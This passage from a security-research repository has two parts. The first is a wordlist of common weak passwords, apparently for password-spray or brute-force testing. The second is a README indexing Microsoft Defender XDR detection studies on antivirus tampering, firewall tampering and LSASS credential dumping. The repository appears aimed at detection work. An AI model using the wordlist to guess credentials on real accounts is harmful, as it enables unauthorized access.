  7 | 111111
  8 | 123123
  9 | 1q2w3e4r
 10 | admin
 11 | letmein
 12 | welcome
 13 | monkey
 14 | 1234
 15 | password1
 16 | 123qwe
 17 | sunshine
 18 | qwerty123
 19 | 123321
 20 | 123
 21 | iloveyou
 22 | 123abc
 23 | password123
 24 | 1qaz2wsx
 25 | 1234qwer
 26 | trustno1
 27 | qwertyuiop
 28 | 1password
 29 | 123123123
 30 | abcdef
 31 | 11111111
 32 | 123r4t5y
 33 | dragon
 34 | 12300
 35 | welcome123
 36 | changeme
 37 | qwerty1
 38 | qazwsx
 39 | superman
 40 | baseball
 41 | letmein123
 42 | monkey123
 43 | sunshine1
 44 | dragon123
 45 | passw0rd
 46 | iloveyou1
 47 | starwars
 48 | password1!
 49 | 1234abcd
 50 | qwerty12
 51 | admin123
 52 | qwertyabc
 53 | qwertz
 54 | 654321
 55 | secret
 56 | 123123123123
 57 | abcdef1234
 58 | 1qazxsw2
 59 | qazwsx123
 60 | adminadmin
 61 | 112233
 62 | abcdefg
 63 | asdfghjkl
 64 | letmein1
 65 | root
 66 | 555555
 67 | 12345qwert
 68 | password1234
 69 | qazxswedc
 70 | test1234
 71 | 121212
 72 | 1password1
 73 | hello123
 74 | 1234abc!
 75 | 11223344
 76 | 1qaz2wsx3edc
 77 | abc12345
 78 | mypassword
 79 | summer
 80 | 1qaz2wsx!QAZ
 81 | 111222
 82 | admin1234
 83 | football
 84 | qazwsxedc
 85 | sunshine123
 86 | passwordqwert
 87 | 123321321
 88 | prince
 89 | adminadmin1
 90 | password1!
 91 | letmein123!
 92 | passwordqwerty
 93 | 1234!qwert
 94 | 123qwerty123
 95 | trustno1!
 96 | password12
 97 | 12345!qwert
 98 | gfhjkl
 99 | starwars123
100 | qwerty12345
101 | 123qwerty!
102 | qwertyuiop1
103 | admin12345
104 | 123!qwerty
105 | passwordqwerty1
106 | abc1234
107 | dragon!123
108 | passwordabc
109 | mypassword1
110 | qwerty!@#
111 | monkey!123
112 | welcome1234
113 | 1234abc123
114 | 123qwerty123!
115 | password1abc
116 | 123password!
117 | qwertyabc123
118 | 1q2w3e4r5t
119 | qwertyqwerty
120 | dragon1234
121 | abc123!@#
122 | superman123
123 | 1111qwerty
124 | password12345
125 | 12345678!
126 | 1234qwerty123
127 | qazwsx!123
128 | qwertyabc!123
129 | letmein!123
130 | summer123
131 | qwerty!1
132 | 12345!abc
133 | monkeyabc
134 | password1234!
135 | passwordqwerty123
136 | abc123qwerty
137 | 987654321
138 | password01
139 | trustno!1
140 | 121212123
141 | letmein1234
142 | sunshine1234
143 | password1abc!
144 | qwerty@123
145 | welcome12345
146 | dragon12345
147 | mypassw0rd
148 | letmeinabc
149 | adminqwerty
150 | dragon@123
151 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # ResearchDev
 2 | In this `ResearchDev` repository, I would like to share threat detection insights throughout ***Microsoft Defender XDR***.
 3 | 
 4 | - [x] Effectively captures all suspicious activities across email, endpoint, identity and application.
 5 | - [x] Correlates alerts from different defenders into a single incident - this holistic view enhances the capabilities of SOC personnel for comprehensive monitoring and management of security incidents.
 6 | 
 7 | | Product | TEST/METHOD & Threat Detection |
 8 | |:--------|:-------------------------------------------------------------------------------------------------------------------------------------------------------------|
 9 | |   MDO   | [MDO Safe Attachments : File Detonation Validation](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV01-MDO-FileDetonation/README.md) |
10 | |   MDE   | [Microsoft Defender AV Tampering, Defense Evasion](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV02-AVtampering/Dev02-AVTampering.md)  |
11 | |   MDE   | [Windows Defender Firewall rule, EDR/AV Communication Tampering](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV03-FirewallTampering/Dev03-FirewallTampering.md) |
12 | |   MDE   | [LSASS credential dumping, MiniDump](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV04-LSASSdumping-MiniDump/Dev04-LSASSdumping-MiniDump.md) |
13 | 
14 | #### Disclaimer
15 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
16 | 


--------------------------------------------------------------------------------